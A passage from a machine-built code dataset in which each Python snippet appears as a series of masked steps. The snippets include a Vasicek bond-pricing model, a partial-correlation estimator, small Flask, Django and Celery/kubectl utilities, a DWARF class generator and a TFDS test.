"step-3": "<mask token>\n\n\nclass Vasicek:\n\n def __init__(self, rs, vol):\n self.t = rs.columns\n self.ps = rs[-1:]\n self.sigma = vol\n\n def get_TheoreticalP(self, x=0):\n sigma = self.sigma\n try:\n _ = x.shape\n except:\n x = self.t\n a = self.a\n b = self.b\n B = (1 - np.exp(-a * x)) / a\n A = np.exp((B - x) * (a ** 2 * b - sigma ** 2 / 2) / a ** 2 - sigma **\n 2 * B ** 2 / (4 * a))\n self.B = B\n self.A = A\n self.sim_p = A * np.exp(-B * x)\n self.r = -1 * np.log(self.sim_p) / x\n return self.r\n\n def loss(self, x):\n self.a = x[0]\n self.b = x[1]\n self.sim_rs = apply(self.get_TheoreticalP, self.ps)\n loss = np.array(self.ps.as_matrix()) - np.array(self.sim_rs)\n loss = 10000 * np.sum(loss ** 2)\n return loss\n\n def solve(self, x0=np.random.rand(2)):\n self.opt_results = optimize.fmin(self.loss, x0=x0)\n self.a = self.opt_results[0]\n self.b = self.opt_results[1]\n print(self.opt_results)\n\n def get_price_rate(self, T, r):\n sigma = list(self.sigma)[T]\n T = self.t[T]\n a = self.a\n b = self.b\n B = (1 - np.exp(-a * T)) / a\n A = np.exp((B - T) * (a ** 2 * b - sigma ** 2 / 2) / a ** 2\n ) - sigma ** 2 * B ** 2 / (4 * a)\n p = A * np.exp(-B * r)\n r = -1 * np.log(p) / T\n return p, r\n\n\n<mask token>\n",
"step-4": "from functions2 import *\nimport numpy as np\nimport numpy as np\nimport math\nfrom scipy import optimize\nimport pylab as pl\nfrom IPython import display as dp\n\n\nclass Vasicek:\n\n def __init__(self, rs, vol):\n self.t = rs.columns\n self.ps = rs[-1:]\n self.sigma = vol\n\n def get_TheoreticalP(self, x=0):\n sigma = self.sigma\n try:\n _ = x.shape\n except:\n x = self.t\n a = self.a\n b = self.b\n B = (1 - np.exp(-a * x)) / a\n A = np.exp((B - x) * (a ** 2 * b - sigma ** 2 / 2) / a ** 2 - sigma **\n 2 * B ** 2 / (4 * a))\n self.B = B\n self.A = A\n self.sim_p = A * np.exp(-B * x)\n self.r = -1 * np.log(self.sim_p) / x\n return self.r\n\n def loss(self, x):\n self.a = x[0]\n self.b = x[1]\n self.sim_rs = apply(self.get_TheoreticalP, self.ps)\n loss = np.array(self.ps.as_matrix()) - np.array(self.sim_rs)\n loss = 10000 * np.sum(loss ** 2)\n return loss\n\n def solve(self, x0=np.random.rand(2)):\n self.opt_results = optimize.fmin(self.loss, x0=x0)\n self.a = self.opt_results[0]\n self.b = self.opt_results[1]\n print(self.opt_results)\n\n def get_price_rate(self, T, r):\n sigma = list(self.sigma)[T]\n T = self.t[T]\n a = self.a\n b = self.b\n B = (1 - np.exp(-a * T)) / a\n A = np.exp((B - T) * (a ** 2 * b - sigma ** 2 / 2) / a ** 2\n ) - sigma ** 2 * B ** 2 / (4 * a)\n p = A * np.exp(-B * r)\n r = -1 * np.log(p) / T\n return p, r\n\n\ndef option_pricing(V, r, t, T, X):\n time_dict = dict(zip(V.t, np.arange(len(V.t))))\n r = r[-1:][t].item()\n P = V.get_price_rate(time_dict[T], r)\n p = V.get_price_rate(time_dict[t], r)\n sigmap = V.sigma[t] * (1 / V.a) * (1 / np.sqrt(t)) * (1 - np.exp(-V.a *\n (T - t))) * np.sqrt((1 - np.exp(-2 * V.a * t)) / (2 * V.a))\n d = 1 / sigmap * np.log(P[0] / (p[0] * X)) + 0.5 * sigmap\n c = P[0] * norm.cdf(d) - X * p[0] * norm.cdf(d - sigmap)\n return c\n",
"step-5": "from functions2 import *\nimport numpy as np\n#from functions import TermStructure,load_data\nimport numpy as np\nimport math\nfrom scipy import optimize\nimport pylab as pl\nfrom IPython import display as dp\n\n\n\n\nclass Vasicek():\n def __init__(self,rs,vol):\n self.t = rs.columns\n self.ps= rs[-1:]\n self.sigma = vol \n \n def get_TheoreticalP(self,x=0):\n sigma = self.sigma\n try:\n _ = x.shape\n except:\n x = self.t\n \n a = self.a\n b = self.b\n B = (1-np.exp(-a*x))/a\n A = np.exp(((B-x)*(a**2*b-(sigma**2)/2))/a**2-(sigma**2*B**2)/(4*a))\n self.B=B\n self.A=A\n self.sim_p = A*np.exp(-B*x)\n self.r = -1*np.log(self.sim_p)/x\n return self.r\n\n \n def loss(self,x):\n self.a = x[0]\n self.b = x[1] \n self.sim_rs = apply(self.get_TheoreticalP,self.ps)\n loss = np.array(self.ps.as_matrix())-np.array(self.sim_rs)\n\n loss = 10000*np.sum(loss**2)\n \n return loss\n\n \n def solve(self,x0=np.random.rand(2)):\n self.opt_results = optimize.fmin(self.loss,x0=x0)#,tol=1e-10,method='Nelder-Mead',options={'maxiter':1800})\n self.a = self.opt_results[0]\n self.b = self.opt_results[1]\n print(self.opt_results)\n \n def get_price_rate(self,T,r):\n \n sigma = list(self.sigma)[T]\n T = self.t[T]\n a = self.a\n b = self.b\n B = (1-np.exp(-a*T))/a\n A = np.exp(((B-T)*(a**2*b-(sigma**2)/2))/a**2)-(sigma**2*B**2)/(4*a)\n p = A*np.exp(-B*r)\n r = -1*np.log(p)/T\n return p,r\n\n\ndef option_pricing(V,r,t,T,X):\n #print('Expiration: {}'.format(t))\n #print('Maturity: {}'.format(T))\n \n time_dict = dict(zip(V.t,np.arange(len(V.t))))\n \n r = r[-1:][t].item()\n \n P = V.get_price_rate(time_dict[T],r)\n \n p = V.get_price_rate(time_dict[t],r)\n \n\n \n sigmap = V.sigma[t]*(1/V.a)*(1/np.sqrt(t))*(1-np.exp(-V.a*(T-t)))*np.sqrt((1-np.exp(-2*V.a*t))/(2*V.a))\n \n d = (1/sigmap)*np.log(P[0]/(p[0]*X))+0.5*sigmap\n \n c = P[0]*norm.cdf(d)-X*p[0]*norm.cdf(d-sigmap)\n \n return c",
"step-ids": [
3,
5,
6,
8,
9
]
}
|
[
3,
5,
6,
8,
9
] |
"""David's first approach when I exposed the problem.
Reasonable to add in the comparison?
"""
import numpy as np
from sklearn.linear_model import RidgeCV
from sklearn.model_selection import ShuffleSplit
def correlation(x, y):
a = (x - x.mean(0)) / x.std(0)
b = (y - y.mean(0)) / y.std(0)
return a.T @ b / x.shape[0]
def partial_correlation_bagging(solver, x, y, z, ensemble=None):
if ensemble is None:
ensemble = [(range(len(x)), range(len(x))), ]
r = []
for set1, set2 in ensemble:
p_x = solver.fit(z[set1], x[set1]).predict(z[set2])
p_y = solver.fit(z[set1], y[set1]).predict(z[set2])
r.append(correlation(x[set2] - p_x, y[set2] - p_y))
return np.mean(r, 0)
def partial_correlation_loop(solver, x, y, ensemble=None):
e_hat = np.zeros(y.shape[1])
for i in range(y.shape[1]):
y_i = y[:, i].reshape(-1, 1)
y_not_i = np.delete(y, i, axis=1)
r = partial_correlation_bagging(solver, x, y_i, y_not_i, ensemble)
e_hat[i] = np.sum(r**2)
return e_hat
class PartialCorrelation(object):
def __init__(self, solver=None, bagging=False):
self.solver = RidgeCV() if solver is None else solver
self.bagging = bagging
def fit(self, X, Y):
ensemble = None
if self.bagging:
cv = ShuffleSplit(test_size=.5)
ensemble = [(train, test) for train, test in cv.split(X, Y)]
self.E_ = partial_correlation_loop(self.solver, X, Y, ensemble)
return self
if __name__ == '__main__':
from sklearn.preprocessing import scale
from sklearn.metrics import roc_auc_score
# Simulate data
"""Y = F(EX+N)"""
np.random.seed(0)
# Problem dimensionality
n = 1000
nE = nX = 10
nY = 10
snr = 25 # signal to noise ratio
    selected = .5 # fraction of X features selected by E
selected = min(int(np.floor(selected*nX)) + 1, nX-1)
E = np.identity(nX)
E[selected:] = 0
# X covariance
Cx = np.random.randn(nX, nX)
    Cx = Cx.dot(Cx.T) / nX # symmetric, positive semi-definite
X = np.random.multivariate_normal(np.zeros(nX), Cx, n)
# Noise (homosedastic in source space)
N = np.random.randn(n, nE)
# Forward operator (linear mixture)
F = np.random.randn(nY, nE)
Y = ((X @ E.T) * snr + N) @ F.T
X = scale(X)
Y = scale(Y)
# Fit method
partialcorr = PartialCorrelation()
train, test = range(0, n, 2), range(1, n, 2)
E_hat = partialcorr.fit(X[train], Y[train]).E_
# score = partialcorr.score(X[test], Y[test]) # TODO
print('E_auc', roc_auc_score(np.diag(E), E_hat))
|
normal
|
{
"blob_id": "dfd2b515e08f285345c750bf00f6a55f43d60039",
"index": 8379,
"step-1": "<mask token>\n\n\ndef partial_correlation_loop(solver, x, y, ensemble=None):\n e_hat = np.zeros(y.shape[1])\n for i in range(y.shape[1]):\n y_i = y[:, i].reshape(-1, 1)\n y_not_i = np.delete(y, i, axis=1)\n r = partial_correlation_bagging(solver, x, y_i, y_not_i, ensemble)\n e_hat[i] = np.sum(r ** 2)\n return e_hat\n\n\nclass PartialCorrelation(object):\n\n def __init__(self, solver=None, bagging=False):\n self.solver = RidgeCV() if solver is None else solver\n self.bagging = bagging\n\n def fit(self, X, Y):\n ensemble = None\n if self.bagging:\n cv = ShuffleSplit(test_size=0.5)\n ensemble = [(train, test) for train, test in cv.split(X, Y)]\n self.E_ = partial_correlation_loop(self.solver, X, Y, ensemble)\n return self\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef correlation(x, y):\n a = (x - x.mean(0)) / x.std(0)\n b = (y - y.mean(0)) / y.std(0)\n return a.T @ b / x.shape[0]\n\n\n<mask token>\n\n\ndef partial_correlation_loop(solver, x, y, ensemble=None):\n e_hat = np.zeros(y.shape[1])\n for i in range(y.shape[1]):\n y_i = y[:, i].reshape(-1, 1)\n y_not_i = np.delete(y, i, axis=1)\n r = partial_correlation_bagging(solver, x, y_i, y_not_i, ensemble)\n e_hat[i] = np.sum(r ** 2)\n return e_hat\n\n\nclass PartialCorrelation(object):\n\n def __init__(self, solver=None, bagging=False):\n self.solver = RidgeCV() if solver is None else solver\n self.bagging = bagging\n\n def fit(self, X, Y):\n ensemble = None\n if self.bagging:\n cv = ShuffleSplit(test_size=0.5)\n ensemble = [(train, test) for train, test in cv.split(X, Y)]\n self.E_ = partial_correlation_loop(self.solver, X, Y, ensemble)\n return self\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef correlation(x, y):\n a = (x - x.mean(0)) / x.std(0)\n b = (y - y.mean(0)) / y.std(0)\n return a.T @ b / x.shape[0]\n\n\ndef partial_correlation_bagging(solver, x, y, z, ensemble=None):\n if ensemble is None:\n ensemble = [(range(len(x)), range(len(x)))]\n r = []\n for set1, set2 in ensemble:\n p_x = solver.fit(z[set1], x[set1]).predict(z[set2])\n p_y = solver.fit(z[set1], y[set1]).predict(z[set2])\n r.append(correlation(x[set2] - p_x, y[set2] - p_y))\n return np.mean(r, 0)\n\n\ndef partial_correlation_loop(solver, x, y, ensemble=None):\n e_hat = np.zeros(y.shape[1])\n for i in range(y.shape[1]):\n y_i = y[:, i].reshape(-1, 1)\n y_not_i = np.delete(y, i, axis=1)\n r = partial_correlation_bagging(solver, x, y_i, y_not_i, ensemble)\n e_hat[i] = np.sum(r ** 2)\n return e_hat\n\n\nclass PartialCorrelation(object):\n\n def __init__(self, solver=None, bagging=False):\n self.solver = RidgeCV() if solver is None else solver\n self.bagging = bagging\n\n def fit(self, X, Y):\n ensemble = None\n if self.bagging:\n cv = ShuffleSplit(test_size=0.5)\n ensemble = [(train, test) for train, test in cv.split(X, Y)]\n self.E_ = partial_correlation_loop(self.solver, X, Y, ensemble)\n return self\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef correlation(x, y):\n a = (x - x.mean(0)) / x.std(0)\n b = (y - y.mean(0)) / y.std(0)\n return a.T @ b / x.shape[0]\n\n\ndef partial_correlation_bagging(solver, x, y, z, ensemble=None):\n if ensemble is None:\n ensemble = [(range(len(x)), range(len(x)))]\n r = []\n for set1, set2 in ensemble:\n p_x = solver.fit(z[set1], x[set1]).predict(z[set2])\n p_y = solver.fit(z[set1], y[set1]).predict(z[set2])\n r.append(correlation(x[set2] - p_x, y[set2] - p_y))\n return np.mean(r, 0)\n\n\ndef partial_correlation_loop(solver, x, y, ensemble=None):\n e_hat = np.zeros(y.shape[1])\n for i in range(y.shape[1]):\n y_i = y[:, i].reshape(-1, 1)\n y_not_i = np.delete(y, i, axis=1)\n r = partial_correlation_bagging(solver, x, y_i, y_not_i, ensemble)\n e_hat[i] = np.sum(r ** 2)\n return e_hat\n\n\nclass PartialCorrelation(object):\n\n def __init__(self, solver=None, bagging=False):\n self.solver = RidgeCV() if solver is None else solver\n self.bagging = bagging\n\n def fit(self, X, Y):\n ensemble = None\n if self.bagging:\n cv = ShuffleSplit(test_size=0.5)\n ensemble = [(train, test) for train, test in cv.split(X, Y)]\n self.E_ = partial_correlation_loop(self.solver, X, Y, ensemble)\n return self\n\n\nif __name__ == '__main__':\n from sklearn.preprocessing import scale\n from sklearn.metrics import roc_auc_score\n \"\"\"Y = F(EX+N)\"\"\"\n np.random.seed(0)\n n = 1000\n nE = nX = 10\n nY = 10\n snr = 25\n selected = 0.5\n selected = min(int(np.floor(selected * nX)) + 1, nX - 1)\n E = np.identity(nX)\n E[selected:] = 0\n Cx = np.random.randn(nX, nX)\n Cx = Cx.dot(Cx.T) / nX\n X = np.random.multivariate_normal(np.zeros(nX), Cx, n)\n N = np.random.randn(n, nE)\n F = np.random.randn(nY, nE)\n Y = (X @ E.T * snr + N) @ F.T\n X = scale(X)\n Y = scale(Y)\n partialcorr = PartialCorrelation()\n train, test = range(0, n, 2), range(1, n, 2)\n E_hat = partialcorr.fit(X[train], Y[train]).E_\n print('E_auc', roc_auc_score(np.diag(E), E_hat))\n",
"step-5": "\"\"\"David's first approach when I exposed the problem.\nReasonable to add in the comparison?\n\"\"\"\nimport numpy as np\nfrom sklearn.linear_model import RidgeCV\nfrom sklearn.model_selection import ShuffleSplit\n\n\ndef correlation(x, y):\n a = (x - x.mean(0)) / x.std(0)\n b = (y - y.mean(0)) / y.std(0)\n return a.T @ b / x.shape[0]\n\n\ndef partial_correlation_bagging(solver, x, y, z, ensemble=None):\n if ensemble is None:\n ensemble = [(range(len(x)), range(len(x))), ]\n r = []\n for set1, set2 in ensemble:\n p_x = solver.fit(z[set1], x[set1]).predict(z[set2])\n p_y = solver.fit(z[set1], y[set1]).predict(z[set2])\n r.append(correlation(x[set2] - p_x, y[set2] - p_y))\n return np.mean(r, 0)\n\n\ndef partial_correlation_loop(solver, x, y, ensemble=None):\n e_hat = np.zeros(y.shape[1])\n for i in range(y.shape[1]):\n y_i = y[:, i].reshape(-1, 1)\n y_not_i = np.delete(y, i, axis=1)\n r = partial_correlation_bagging(solver, x, y_i, y_not_i, ensemble)\n e_hat[i] = np.sum(r**2)\n return e_hat\n\n\nclass PartialCorrelation(object):\n\n def __init__(self, solver=None, bagging=False):\n self.solver = RidgeCV() if solver is None else solver\n self.bagging = bagging\n\n def fit(self, X, Y):\n ensemble = None\n if self.bagging:\n cv = ShuffleSplit(test_size=.5)\n ensemble = [(train, test) for train, test in cv.split(X, Y)]\n self.E_ = partial_correlation_loop(self.solver, X, Y, ensemble)\n return self\n\n\nif __name__ == '__main__':\n from sklearn.preprocessing import scale\n from sklearn.metrics import roc_auc_score\n # Simulate data\n \"\"\"Y = F(EX+N)\"\"\"\n\n np.random.seed(0)\n\n # Problem dimensionality\n n = 1000\n nE = nX = 10\n nY = 10\n snr = 25 # signal to noise ratio\n selected = .5 # number of X feature selected by E\n\n selected = min(int(np.floor(selected*nX)) + 1, nX-1)\n E = np.identity(nX)\n E[selected:] = 0\n\n # X covariance\n Cx = np.random.randn(nX, nX)\n Cx = Cx.dot(Cx.T) / nX # sym pos-semidefin\n X = np.random.multivariate_normal(np.zeros(nX), Cx, n)\n\n # Noise (homosedastic in source space)\n N = np.random.randn(n, nE)\n\n # Forward operator (linear mixture)\n F = np.random.randn(nY, nE)\n\n Y = ((X @ E.T) * snr + N) @ F.T\n\n X = scale(X)\n Y = scale(Y)\n\n # Fit method\n partialcorr = PartialCorrelation()\n train, test = range(0, n, 2), range(1, n, 2)\n E_hat = partialcorr.fit(X[train], Y[train]).E_\n # score = partialcorr.score(X[test], Y[test]) # TODO\n\n print('E_auc', roc_auc_score(np.diag(E), E_hat))\n",
"step-ids": [
4,
5,
6,
7,
9
]
}
|
[
4,
5,
6,
7,
9
] |
#!flask/bin/python
from config import SQLALCHEMY_DATABASE_URI
from app.models import Patient, Appointment, PhoneCalls
from app import db
import os.path
db.create_all()
# Patient.generate_fake();
# Appointment.generate_fake();
# PhoneCalls.generate_fake();
Patient.add_patient();
Appointment.add_appointment();
PhoneCalls.add_call();
|
normal
|
{
"blob_id": "173e6017884a1a4df64018b306ea71bcaa1c5f1d",
"index": 4528,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ndb.create_all()\nPatient.add_patient()\nAppointment.add_appointment()\nPhoneCalls.add_call()\n",
"step-3": "from config import SQLALCHEMY_DATABASE_URI\nfrom app.models import Patient, Appointment, PhoneCalls\nfrom app import db\nimport os.path\ndb.create_all()\nPatient.add_patient()\nAppointment.add_appointment()\nPhoneCalls.add_call()\n",
"step-4": "#!flask/bin/python\nfrom config import SQLALCHEMY_DATABASE_URI\nfrom app.models import Patient, Appointment, PhoneCalls\nfrom app import db\nimport os.path\ndb.create_all()\n\n# Patient.generate_fake();\n# Appointment.generate_fake();\n# PhoneCalls.generate_fake();\n\nPatient.add_patient();\nAppointment.add_appointment();\nPhoneCalls.add_call();",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# -*- coding: utf-8 -*-
class Task:
def __init__(self):
self.title = ''
self.subtasks = []
def set_title(self, title):
self.title = title
def set_subtasks(self, subtasks):
self.subtasks = subtasks
|
normal
|
{
"blob_id": "3cf2ffbc8163c2a447016c93ff4dd13e410fff2b",
"index": 7353,
"step-1": "<mask token>\n",
"step-2": "class Task:\n <mask token>\n <mask token>\n\n def set_subtasks(self, subtasks):\n self.subtasks = subtasks\n",
"step-3": "class Task:\n\n def __init__(self):\n self.title = ''\n self.subtasks = []\n <mask token>\n\n def set_subtasks(self, subtasks):\n self.subtasks = subtasks\n",
"step-4": "class Task:\n\n def __init__(self):\n self.title = ''\n self.subtasks = []\n\n def set_title(self, title):\n self.title = title\n\n def set_subtasks(self, subtasks):\n self.subtasks = subtasks\n",
"step-5": "# -*- coding: utf-8 -*-\nclass Task:\n def __init__(self):\n self.title = ''\n self.subtasks = []\n\n def set_title(self, title):\n self.title = title\n\n def set_subtasks(self, subtasks):\n self.subtasks = subtasks\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
from plumbum import local, FG, ProcessExecutionError
import logging
import os.path
from task import app
kubectl = local["kubectl"]
@app.task
def create_kube_from_template(file_name, *aargs):
args = {}
for a in aargs:
args.update(a)
template = open(os.path.join('..', file_name)).read() % args
logging.info((kubectl["create", "-f", "-", "--logtostderr"] << template)())
@app.task
def delete_kube_by_name(name):
try:
logging.info((kubectl["delete", name])())
return True
except ProcessExecutionError:
return False
|
normal
|
{
"blob_id": "137e80b3bfdc0dba33a3108b37d21d298a8f251d",
"index": 1544,
"step-1": "<mask token>\n\n\[email protected]\ndef delete_kube_by_name(name):\n try:\n logging.info(kubectl['delete', name]())\n return True\n except ProcessExecutionError:\n return False\n",
"step-2": "<mask token>\n\n\[email protected]\ndef create_kube_from_template(file_name, *aargs):\n args = {}\n for a in aargs:\n args.update(a)\n template = open(os.path.join('..', file_name)).read() % args\n logging.info((kubectl['create', '-f', '-', '--logtostderr'] << template)())\n\n\[email protected]\ndef delete_kube_by_name(name):\n try:\n logging.info(kubectl['delete', name]())\n return True\n except ProcessExecutionError:\n return False\n",
"step-3": "<mask token>\nkubectl = local['kubectl']\n\n\[email protected]\ndef create_kube_from_template(file_name, *aargs):\n args = {}\n for a in aargs:\n args.update(a)\n template = open(os.path.join('..', file_name)).read() % args\n logging.info((kubectl['create', '-f', '-', '--logtostderr'] << template)())\n\n\[email protected]\ndef delete_kube_by_name(name):\n try:\n logging.info(kubectl['delete', name]())\n return True\n except ProcessExecutionError:\n return False\n",
"step-4": "from plumbum import local, FG, ProcessExecutionError\nimport logging\nimport os.path\nfrom task import app\nkubectl = local['kubectl']\n\n\[email protected]\ndef create_kube_from_template(file_name, *aargs):\n args = {}\n for a in aargs:\n args.update(a)\n template = open(os.path.join('..', file_name)).read() % args\n logging.info((kubectl['create', '-f', '-', '--logtostderr'] << template)())\n\n\[email protected]\ndef delete_kube_by_name(name):\n try:\n logging.info(kubectl['delete', name]())\n return True\n except ProcessExecutionError:\n return False\n",
"step-5": "from plumbum import local, FG, ProcessExecutionError\nimport logging\nimport os.path\n\nfrom task import app\n\nkubectl = local[\"kubectl\"]\n\[email protected]\ndef create_kube_from_template(file_name, *aargs):\n args = {}\n for a in aargs:\n args.update(a)\n template = open(os.path.join('..', file_name)).read() % args\n logging.info((kubectl[\"create\", \"-f\", \"-\", \"--logtostderr\"] << template)())\n\[email protected]\ndef delete_kube_by_name(name):\n try:\n logging.info((kubectl[\"delete\", name])())\n return True\n except ProcessExecutionError:\n return False\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from pointsEau.models import PointEau
from django.contrib.auth.models import User
from rest_framework import serializers
class PointEauSerializer(serializers.ModelSerializer):
class Meta:
model = PointEau
fields = [
'pk',
'nom',
'lat',
'long',
'desc',
'owner'
]
nom = serializers.CharField(max_length=100)
long = serializers.DecimalField(max_digits=10, decimal_places=8)
lat = serializers.DecimalField(max_digits=10, decimal_places=8)
desc = serializers.CharField(max_length=255)
owner = serializers.ReadOnlyField(source='owner.username')
class UserSerializer(serializers.ModelSerializer):
pointseau = serializers.PrimaryKeyRelatedField(many=True, queryset=PointEau.objects.all())
class Meta:
model = User
fields = ('id', 'username', 'pointseau')
|
normal
|
{
"blob_id": "51f171b3847b3dbf5657625fdf3b7fe771e0e004",
"index": 4743,
"step-1": "<mask token>\n\n\nclass UserSerializer(serializers.ModelSerializer):\n pointseau = serializers.PrimaryKeyRelatedField(many=True, queryset=\n PointEau.objects.all())\n\n\n class Meta:\n model = User\n fields = 'id', 'username', 'pointseau'\n",
"step-2": "<mask token>\n\n\nclass PointEauSerializer(serializers.ModelSerializer):\n\n\n class Meta:\n model = PointEau\n fields = ['pk', 'nom', 'lat', 'long', 'desc', 'owner']\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass UserSerializer(serializers.ModelSerializer):\n pointseau = serializers.PrimaryKeyRelatedField(many=True, queryset=\n PointEau.objects.all())\n\n\n class Meta:\n model = User\n fields = 'id', 'username', 'pointseau'\n",
"step-3": "<mask token>\n\n\nclass PointEauSerializer(serializers.ModelSerializer):\n\n\n class Meta:\n model = PointEau\n fields = ['pk', 'nom', 'lat', 'long', 'desc', 'owner']\n nom = serializers.CharField(max_length=100)\n long = serializers.DecimalField(max_digits=10, decimal_places=8)\n lat = serializers.DecimalField(max_digits=10, decimal_places=8)\n desc = serializers.CharField(max_length=255)\n owner = serializers.ReadOnlyField(source='owner.username')\n\n\nclass UserSerializer(serializers.ModelSerializer):\n pointseau = serializers.PrimaryKeyRelatedField(many=True, queryset=\n PointEau.objects.all())\n\n\n class Meta:\n model = User\n fields = 'id', 'username', 'pointseau'\n",
"step-4": "from pointsEau.models import PointEau\nfrom django.contrib.auth.models import User\nfrom rest_framework import serializers\n\n\nclass PointEauSerializer(serializers.ModelSerializer):\n\n\n class Meta:\n model = PointEau\n fields = ['pk', 'nom', 'lat', 'long', 'desc', 'owner']\n nom = serializers.CharField(max_length=100)\n long = serializers.DecimalField(max_digits=10, decimal_places=8)\n lat = serializers.DecimalField(max_digits=10, decimal_places=8)\n desc = serializers.CharField(max_length=255)\n owner = serializers.ReadOnlyField(source='owner.username')\n\n\nclass UserSerializer(serializers.ModelSerializer):\n pointseau = serializers.PrimaryKeyRelatedField(many=True, queryset=\n PointEau.objects.all())\n\n\n class Meta:\n model = User\n fields = 'id', 'username', 'pointseau'\n",
"step-5": "from pointsEau.models import PointEau\nfrom django.contrib.auth.models import User\nfrom rest_framework import serializers\n\n\nclass PointEauSerializer(serializers.ModelSerializer):\n class Meta:\n model = PointEau\n fields = [\n 'pk',\n 'nom',\n 'lat',\n 'long',\n 'desc',\n 'owner'\n ]\n nom = serializers.CharField(max_length=100)\n long = serializers.DecimalField(max_digits=10, decimal_places=8)\n lat = serializers.DecimalField(max_digits=10, decimal_places=8)\n desc = serializers.CharField(max_length=255)\n owner = serializers.ReadOnlyField(source='owner.username')\n\n\nclass UserSerializer(serializers.ModelSerializer):\n pointseau = serializers.PrimaryKeyRelatedField(many=True, queryset=PointEau.objects.all())\n\n class Meta:\n model = User\n fields = ('id', 'username', 'pointseau')\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
#!/usr/bin/env python
import sys
sys.path.append('./spec')
# FIXME: make the spec file an argument to this script
from dwarf3 import *
def mandatory_fragment(mand):
if mand:
return "mandatory"
else:
return "optional"
def super_attrs(tag):
#sys.stderr.write("Calculating super attrs for %s\n" % tag)
# attrs of all bases, plus super_attrs of all bases
immediate_base_attrs = sum([tag_map.get(base, ([], [], []))[0] \
for base in tag_map.get(tag, ([], [], []))[2] + artificial_tag_map.get(tag, ([], [], []))[2]], []) \
+ sum([artificial_tag_map.get(base, ([], [], []))[0] \
for base in tag_map.get(tag, ([], [], []))[2] + artificial_tag_map.get(tag, ([], [], []))[2]], [])
base_attrs = sum(map(super_attrs, tag_map.get(tag, ([], [], []))[2]), immediate_base_attrs) + \
sum(map(super_attrs, artificial_tag_map.get(tag, ([], [], []))[2]), [])
#sys.stderr.write("Calculated super attrs for %s as %s\n" % (tag, str([x for x in set(base_attrs)])))
return [x for x in set(base_attrs)] #+ tag_map[tag][0]
def main(argv):
for (tag, (attr_list, children, bases) ) in tags:
print "forward_decl(%s)" % tag
for (tag, (attr_list, children, bases) ) in tags:
print "begin_class(%s, %s, %s)" % (tag, \
'base_initializations(' + ', '.join(["initialize_base(" + base + ")" for base in bases]) + ')', \
', '.join(["declare_base(%s)" % base for base in bases]))
for (attr, mand) in attr_list:
print "\tattr_%s(%s, %s)" % (mandatory_fragment(mand), attr, attr_type_map[attr])
for (attr, mand) in super_attrs(tag):
print "\tsuper_attr_%s(%s, %s)" % (mandatory_fragment(mand), attr, attr_type_map[attr])
for child in children:
print "\tchild_tag(%s)" % child
print "#ifdef extra_decls_%s\n\textra_decls_%s\n#endif" % (tag, tag)
print "end_class(%s)" % tag
# main script
if __name__ == "__main__":
main(sys.argv[1:])
|
normal
|
{
"blob_id": "223d96806631e0d249e8738e9bb7cf5b1f48a8c1",
"index": 4252,
"step-1": "#!/usr/bin/env python\n\nimport sys\n\nsys.path.append('./spec')\n\n# FIXME: make the spec file an argument to this script\nfrom dwarf3 import *\n\ndef mandatory_fragment(mand):\n if mand: \n return \"mandatory\"\n else:\n return \"optional\" \n\ndef super_attrs(tag):\n #sys.stderr.write(\"Calculating super attrs for %s\\n\" % tag)\n # attrs of all bases, plus super_attrs of all bases\n immediate_base_attrs = sum([tag_map.get(base, ([], [], []))[0] \\\n for base in tag_map.get(tag, ([], [], []))[2] + artificial_tag_map.get(tag, ([], [], []))[2]], []) \\\n + sum([artificial_tag_map.get(base, ([], [], []))[0] \\\n for base in tag_map.get(tag, ([], [], []))[2] + artificial_tag_map.get(tag, ([], [], []))[2]], [])\n base_attrs = sum(map(super_attrs, tag_map.get(tag, ([], [], []))[2]), immediate_base_attrs) + \\\n sum(map(super_attrs, artificial_tag_map.get(tag, ([], [], []))[2]), [])\n #sys.stderr.write(\"Calculated super attrs for %s as %s\\n\" % (tag, str([x for x in set(base_attrs)])))\n return [x for x in set(base_attrs)] #+ tag_map[tag][0]\n\ndef main(argv):\n for (tag, (attr_list, children, bases) ) in tags:\n print \"forward_decl(%s)\" % tag\n for (tag, (attr_list, children, bases) ) in tags:\n print \"begin_class(%s, %s, %s)\" % (tag, \\\n 'base_initializations(' + ', '.join([\"initialize_base(\" + base + \")\" for base in bases]) + ')', \\\n ', '.join([\"declare_base(%s)\" % base for base in bases]))\n for (attr, mand) in attr_list:\n print \"\\tattr_%s(%s, %s)\" % (mandatory_fragment(mand), attr, attr_type_map[attr])\n for (attr, mand) in super_attrs(tag):\n print \"\\tsuper_attr_%s(%s, %s)\" % (mandatory_fragment(mand), attr, attr_type_map[attr])\n for child in children:\n print \"\\tchild_tag(%s)\" % child\n print \"#ifdef extra_decls_%s\\n\\textra_decls_%s\\n#endif\" % (tag, tag)\n print \"end_class(%s)\" % tag\n\n# main script\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# coding=utf-8
# Copyright 2022 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tensorflow_datasets.core.community.register_path."""
from etils import epath
from tensorflow_datasets.core.community import register_path
def test_data_dir_register():
register = register_path.DataDirRegister(
namespace_to_data_dirs={'ns1': [epath.Path('/path/ns1')]})
assert {'ns1'} == register.namespaces
|
normal
|
{
"blob_id": "ed65d7e0de3fc792753e34b77254bccc8cee6d66",
"index": 3657,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_data_dir_register():\n register = register_path.DataDirRegister(namespace_to_data_dirs={'ns1':\n [epath.Path('/path/ns1')]})\n assert {'ns1'} == register.namespaces\n",
